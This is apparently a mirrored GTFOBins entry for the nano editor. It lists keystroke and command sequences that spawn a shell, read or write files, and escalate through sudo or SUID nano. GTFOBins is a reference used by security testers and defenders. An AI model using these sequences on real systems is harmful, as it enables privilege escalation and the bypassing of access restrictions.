1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/nano.md
2021-01-10 18:16:30 +01:00

32 lines
709 B
Markdown

---
functions:
shell:
- code: |
nano
^R^X
reset; sh 1>&0 2>&0
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
code: |
nano -s /bin/sh
/bin/sh
^T
file-write:
- code: |
nano file_to_write
DATA
^O
file-read:
- code: nano file_to_read
limited-suid:
- description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
code: |
./nano -s /bin/sh
/bin/sh
^T
sudo:
- code: |
sudo nano
^R^X
reset; sh 1>&0 2>&0
---